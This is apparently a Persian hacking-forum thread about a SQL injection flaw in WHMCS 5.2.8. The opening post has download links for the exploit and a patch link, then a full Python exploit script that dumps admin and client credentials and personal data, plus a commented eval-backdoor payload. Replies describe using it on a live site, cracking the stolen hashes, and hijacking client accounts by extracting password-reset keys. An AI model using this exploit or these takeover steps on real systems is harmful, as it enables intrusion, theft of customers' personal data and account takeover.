SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

    با سلام خدمت تمامی دوستان عزیز
    چند روزی هست که یک باگ SQLi از WHMCS پابلیک شده که کمی امنیت سایت های هاستینگ که از این CMS و این ورژن استفاده میکنند رو به خطر میندازه...
    یک فیلم آموزشی از این باگ تهیه شده که میتونید از لینک زیر دانلود کنید :
    http://iranhack.com/dl/whmcs_new_bug.part1.rar
    http://iranhack.com/dl/whmcs_new_bug.part2.rar
    http://iranhack.com/dl/whmcs_new_bug.part3.rar
    http://iranhack.com/dl/whmcs_new_bug.part4.rar
    http://iranhack.com/dl/whmcs_new_bug.part5.rar
    http://iranhack.com/dl/whmcs_new_bug.part6.rar
    http://iranhack.com/dl/whmcs_new_bug.part7.rar
    لینک دانلود اکسپلویت :
    http://iranhack.com/dl/expl.rar
    پسورد فایل های فشرده : iranhackforever
    ابتدا همه ی پارت ها رو دانلود کرده و سپس در یک مکان از حالت فشرده خارج کنید
    و اما برای پچ کردن، این فایل رو میتونید از وبسایت رسمی whmcs دانلود کنید : http://www.whmcs.com/members/dl.php?type=d&id=418
    و فایل های موجود در این فایل رو جایگزین فایل های فعلی کنید...

    کد اکسپلویت برای عزیزانی که با utf ویندوز و لینوکس مشکل دارند :

    کد:
    #!/usr/bin/env python
    
    url = 'http://target.com' 
    
    import urllib, re, sys
    from urllib2 import Request, urlopen
    ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
    
    def exploit(sql):
    	sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql
    	print "Doing stuff: %s" % sqlUnion
    	#you could exploit any file that does a select, I randomly chose viewticket.php
    	r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read()
    	return re.search(r'<div class="clientmsg">(.*?)</div>', r, re.DOTALL).group(1).strip()
    
    #get admins
    print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)')
    
    #get users
    count = int(exploit('(SELECT COUNT(id) FROM tblclients)'))
    print "User count %d" % count
    for i in range(count):	
    	print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i)
    
    #are you evil? yes, you are!
    #php = "1';eval($_REQUEST['lol_whmcs']);#"
    #r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()
    موفق باشید
     
    [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

    همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
     

  • #2
    RE: WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

    دمتون گرم بابا

    ماشا الله ...

    خیلی ایول داره ، روی یه جایی که خیلی معروفه تست زدم نتیجه داد [img]images/smilies/Smileys/78.gif[/img]

    فقط الگوریتم هش اونو کسی داره بزاره یه Cracker واسش بزنیم با Hashcat و rainbowcrack نتیجه خاصی نداد بهمون [img]images/smilies/Smileys/102.gif[/img]
    کوروش خلیجتو خلیج عرب نامیدن ، ولی بازم عربو تو وطن راه میدن همون عربهای که هستن تشنه به خونمون همونا که دخترا رو کردن زنده به گورشون

    نظر


    • #3
      RE: WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

      دمتون گرم بابا

      ماشا الله ...

      خیلی ایول داره ، روی یه جایی که خیلی معروفه تست زدم نتیجه داد

      فقط الگوریتم هش اونو کسی داره بزاره یه Cracker واسش بزنیم با Hashcat و rainbowcrack نتیجه خاصی نداد بهمون
      سلام. هش ادمین به صورت MD5 ساده هست که تو سایت های کرک آنلاین هم می تونید کرکشون کنید. هش کلاینت ها به صورت MD5($salt.$pass) هستش که با برنامه هایی مثله PasswordPro و .... خودتون باید کرک کنید. کلا اگه با کرک کردن به نتیجه نرسیدید پسورد رو می تونید ریکاوری کنید با pwreset.php که whmcs داره. من کلاینت پسورد ریست کردم جواب داد ، رو ادمین تست نکردم....

      نظر


      • #4
        RE: WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

        با کرک های آنلاین نمیشه نتیجه خوبی گرفت من با GPU این کارو میکنم و البته تست کردم راههای شما رو نشده طرف پسورد گذاشته غول

        و در ضمن MD5 هم که باشه هر اسکریپت یه الگوریتم خواص واسه Hash داره مثل وردپرس ، جوملا ، وی بی ، دروپال که با هم مچ میشه !

        اگر توضیحاتم اشتباه هست دوستان تصحیح کنن
        کوروش خلیجتو خلیج عرب نامیدن ، ولی بازم عربو تو وطن راه میدن همون عربهای که هستن تشنه به خونمون همونا که دخترا رو کردن زنده به گورشون

        نظر


        • #5
          RE: WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

          ا کرک های آنلاین نمیشه نتیجه خوبی گرفت من با GPU این کارو میکنم و البته تست کردم راههای شما رو نشده طرف پسورد گذاشته غول

          و در ضمن MD5 هم که باشه هر اسکریپت یه الگوریتم خواص واسه Hash داره مثل وردپرس ، جوملا ، وی بی ، دروپال که با هم مچ میشه !

          اگر توضیحاتم اشتباه هست دوستان تصحیح کنن
          اگوریتم هشینگ MِD5 یه چیزه ثابت هستش و نسبت به اسکریپت استفاده شده تغییر نمیکنه! من پسورد ادمین whmcs رو به صورت آنلاین کرک کردم (پس الگوریتمی که شما می فرمایی اشتباهه) همچنین با PasswordPro هش یوزرهای whmcs رو کرک کردم که md5 salt هستش < MD5($salt.$pass)
          کرک کردن به کنار شما برای دسترسی گرفتن از یوزرهای whmcs میتونی درخواست ریست پسورد (ریکاوری) بدی. یه لینک با یه کد برای اون شخص ارسال میشه ، که اون کد داخل دیتابیس whmcs هم ذخیره میشه شما با اینجکت کردن می تونی verify key رو از DB در بیاری و پسورد رو ریست کنی. کلید ریست کردن پسورد کلاینتهای (مشتریهای whmcs سایت) داخل تیبل tblclients و ستون pwresetkey هستش.... به این صورت ازش استفاده می کنیم بعدش پسورد دلخواه رو ست میکنیم.
          site.com/whmcs/pwreset.php?key=f5cead89238aab520b665b1a4269660d
          من فقط نمی دونم که کلید ریست ادمین کجای DB ذخیره میشه ، اگه کسی میدونه بگه.
          لینک ریست ادمین به این صورته:
          site.com/admin/login.php?action=reset&[email protected]&tim estamp=1382355525&verify=a8a97564e9fce78ad4dbb9116 d868a77
          من هرچی میگردم این timestamp و verify key رو (واسه ادمین) پیدا نمی کنم....
          Remot3r امیدوارم متوجه شده باشی
          بدرود

          نظر


          • #6
            RE: WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

            فرمایشات شما کاملا متین

            اما ما یه وردپرس داریم روی همون دیتابیس هست چرا نوع هش اون با MD5 عادی فرق داره ?
            کوروش خلیجتو خلیج عرب نامیدن ، ولی بازم عربو تو وطن راه میدن همون عربهای که هستن تشنه به خونمون همونا که دخترا رو کردن زنده به گورشون

            نظر


            • #7
              RE: WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

              نوشته اصلی توسط 'Remot3r' pid='4590' dateline='1382362278'
              فرمایشات شما کاملا متین

              اما ما یه وردپرس داریم روی همون دیتابیس هست چرا نوع هش اون با MD5 عادی فرق داره ?


               
              دوست عزیز دیگه از بحث خارج نشید شما در مورد هش های WHMCS سؤال پرسیدید و جوابتون رو دریافت کردید.
              اما در مورد سؤالتون باید عرض کنم که هش وردپرس الگوریتمش کلّاً فرق میکنه با بقیه  و کرک کردنش کار راحتی نیست اگر هم روشی باشه هنوز پابلیک نشده. فقط یه اسکریپت هست که با یک دیکشنری پسورد میاد چک میکنه اون پسورد رو و کرک میکنه که اگه پیداش کردم براتون میزارم.
              در کل باتوجه به اینکه فرمودین وردپرس بر روی اون سایت هست پیشنهاد من برای نفوذ این هست که از طریق بیرون کشیدن Activation Key اقدام به تغییر پسورد ادمین کنید.
              موفق باشید
               
              [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

              همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
               

              نظر


              • #8
                RE: WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

                Moji Rider عزیزم

                از اول گفته من این بوده که Whmcs یک الگوریتم خاص واسه تغییر هش داره دوست عزیزمون FTA BOY یا منظور منو بد متوجه شد یا دقت نکردن به نوشته من جسارت نشه شما استاد های من هستید :x

                مطلبی که ایشون گفتند این بود که هش MD5 هست درسته MD5 هست اما هر اسکریپت یک الگوریتم داره که با نوع اینکودینگ عادی MD5 فرق داره مثل وردپرس که اگر نوع هش اونو با یه هش عادی MD5 مقایسه کنید میبینید که تفاوت بسیاری داره . وقتی جدول های دیتابیس داره از طریق اسکریپت امپورت میشه داخل پایگاه داده این اینکودینگ هم با MD5 مچ میشه .

                همین دوستان من [img]images/smilies/Smileys/8.gif[/img]
                کوروش خلیجتو خلیج عرب نامیدن ، ولی بازم عربو تو وطن راه میدن همون عربهای که هستن تشنه به خونمون همونا که دخترا رو کردن زنده به گورشون

                نظر


                • #9
                  RE: WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

                  نوشته اصلی توسط 'Remot3r' pid='4592' dateline='1382364916'
                  Moji Rider عزیزم

                  از اول گفته من این بوده که Whmcs یک الگوریتم خاص واسه تغییر هش داره دوست عزیزمون FTA BOY یا منظور منو بد متوجه شد یا دقت نکردن به نوشته من جسارت نشه شما استاد های من هستید :x

                  مطلبی که ایشون گفتند این بود که هش MD5 هست درسته MD5 هست اما هر اسکریپت یک الگوریتم داره که با نوع اینکودینگ عادی MD5 فرق داره مثل وردپرس که اگر نوع هش اونو با یه هش عادی MD5 مقایسه کنید میبینید که تفاوت بسیاری داره . وقتی جدول های دیتابیس داره از طریق اسکریپت امپورت میشه داخل پایگاه داده این اینکودینگ هم با MD5 مچ میشه .

                  همین دوستان من [img]images/smilies/Smileys/8.gif[/img]

                   
                  دوست عزیز شما در مورد چگونگی کرک این هش ها پرسیدین ایشون هم جواب دادن که الگوریتم هش پسوردهای تیبل ادمین md5 هست و کاملاً هم درست گفتند و الگوریتم اصلیش هم md5 هست اما دلیل کرک نشدن برخی از این هش ها، پسورد طولانی هست که ادمین انتخاب میکنه به طور مثال الان بنده یک کلمه رو به صورت md5 اینکد کردم :
                  c934663debcc247f12ec225f084e0384
                  ولی اگر چک کنید میبینید که کرک نمیشه چون کلمه طولانی هست و متشکل از عدد و حرف.
                  اما تیبل کلاینت ها همونطور که شما گفتین ممکنه از الگوریتم خاصی استفاده کنه برای اینکد کردن پسوردها با توجه به این که Salt هم داره.
                  و همینطور نوید عزیز توضیح داد که برای نفوذ به اکانت کلاینت ها باید از طریق reset password اقدام کنید و از طریق ردیف ( pwresetkey  ( row و reset key رو از داخل دیتابیس بیرون بکشید و پسورد جدید برای اکانت بزارید با همون روشی که گفته شد...
                   
                  [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

                  همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
                   

                  نظر


                  • #10
                    RE: WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

                    ببخشین میتونم بپرسم با کدوم سایت کرک کردن؟

                    ما که به هر دری زیدم نتونستیم کرک کنیم
                     

                    نظر


                    • #11
                      RE: WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

                      نوشته اصلی توسط 'Mr.Milad' pid='4622' dateline='1382437400'
                      ببخشین میتونم بپرسم با کدوم سایت کرک کردن؟

                      ما که به هر دری زیدم نتونستیم کرک کنیم
                       

                       
                      سلام
                      دو تا سایت برای کرک هش های md5 هسعت که بنده خیلی قبولشون دارم :
                      http://hash-cracker.com
                      http://md5decrypter.co.uk
                      این سایت ها برای کرک هش ادمین مناسب هست با توجه به توضیحاتی که در بالا داده شد ( پسورد پیچیده و طولانی نباشه )
                      برای نفوذ به اکانت کلاینت ها هم که در پست های قبلی توضیح داده شده
                      موفق باشید...
                       
                      [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

                      همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
                       

                      نظر


                      • #12
                        RE: WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

                        ما تا مرحله پسورد رفتیم اینم پسورد 4d16ff86d22ff0b5bdc0f552af6d11db    اما کرک نمیشه دوستان یه نمونه فیلم میزارن که با این اسکریپت که یوزر و پسوردها رو کشیدیم بیرون حالا چطوری این پسورد رو کرک یا تغییرش بدیم و آپدیتش کنیم به پسورد دلخواه خودمون؟


                        البته از طریق سایت های انلاین کرک تست شد و حتی با برنامه ها هم اما کرک نشد
                        راهی نیستش که از طریق همین اسکریپت این کدهای هش رو تغییر بدیم به پسورد دلخواه
                        ممنون میشم کمک کنید

                        نظر


                        • #13
                          RE: WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

                          در صورتی که این پسوردی که به دست آوردید پسورد ادمین هست بهتره که سعی کنید کرکش کنید چون در صورتی که کرک نشه مشکلات زیادی برای نفوذ به اکانت ادمین خواهید داشت مانند : عوض شدن صفحه ادمین و اینکه اگر صفحه مدیریت هم عوض نشده باشه، پس از درخواست پسورد، پسورد به ایمیل ادمین ارسال میشه و مانند کلاینت ها، Password Reset Key به اون تعلق نمیگیره...
                          اما در صورتی که این پسورد، پسورد کلاینت هست ( که نیست ) بهتره که از pwresetkey استفاده کنید برای قرار دادن پسورد جدید برای اون یوزر.
                          موفق باشید
                           
                          [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

                          همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
                           

                          نظر


                          • #14
                            RE: WHMCS V 5.2.8 SQLi Vulnerability | Video + Exploit + Patch

                            میشه این قسمت دوم مال کلاینت رو توضیح بدید  که چطوری باید  انجامش بدیم چون  با این اسکریپت نشد  یا من دستورات آپدیت رو خوب انجام ندادم یا نشد اگه میشه  یا در قالب فیلم یا یه متنی  مثالی بزنید که انجام بدیم

                            و اگه میشه بگید دستورات آپدیت رو چطوری ببریم به کار در این اسکریپت که بشه پسورد  جایگزین پسورد قبلی کرد
                            ممنون

                            نظر

                            صبر کنید ..
                            X